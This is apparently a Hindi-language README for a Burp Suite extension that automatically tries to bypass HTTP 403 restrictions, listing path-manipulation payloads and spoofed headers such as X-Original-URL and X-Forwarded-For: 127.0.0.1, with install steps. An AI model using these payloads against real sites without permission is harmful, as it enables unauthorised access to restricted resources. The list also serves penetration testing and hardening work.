
403 प्रतिबंधित निर्देशिका को बायपास करने के लिए Burpsuite एक्सटेंशन
एक burpsuite एक्सटेंशन जो 403 प्रतिबंधित निर्देशिका को बायपास करता है। PassiveScan (डिफ़ॉल्ट रूप से सक्षम) का उपयोग करके, प्रत्येक 403 अनुरोध इस एक्सटेंशन द्वारा स्वचालित रूप से स्कैन किया जाएगा, इसलिए बस burpsuite में जोड़ें और आनंद लें।
पेलोड: $1: होस्टनाम $2: पथ
$1/$2
$1/%2e/$2
$1/$2/.
$1//$2//
$1/./$2/./
$1/$2anything -H "X-Original-URL: /$2"
$1/$2 -H "X-Custom-IP-Authorization: 127.0.0.1"
$1 -H "X-Rewrite-URL: /$2"
$1/$2 -H "Referer: /$2"
$1/$2 -H "X-Originating-IP: 127.0.0.1"
$1/$2 -H "X-Forwarded-For: 127.0.0.1"
$1/$2 -H "X-Remote-IP: 127.0.0.1"
$1/$2 -H "X-Client-IP: 127.0.0.1"
$1/$2 -H "X-Host: 127.0.0.1"
$1/$2 -H "X-Forwarded-Host: 127.0.0.1"
$1/$2%20/
$1/%20$2%20/
$1/$2?
$1/$2???
$1/$2//
$1/$2/
$1/$2/.randomstring
$1/$2..;/
धन्यवाद @lohubi को कई पेलोड योगदान देने के लिए।
BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish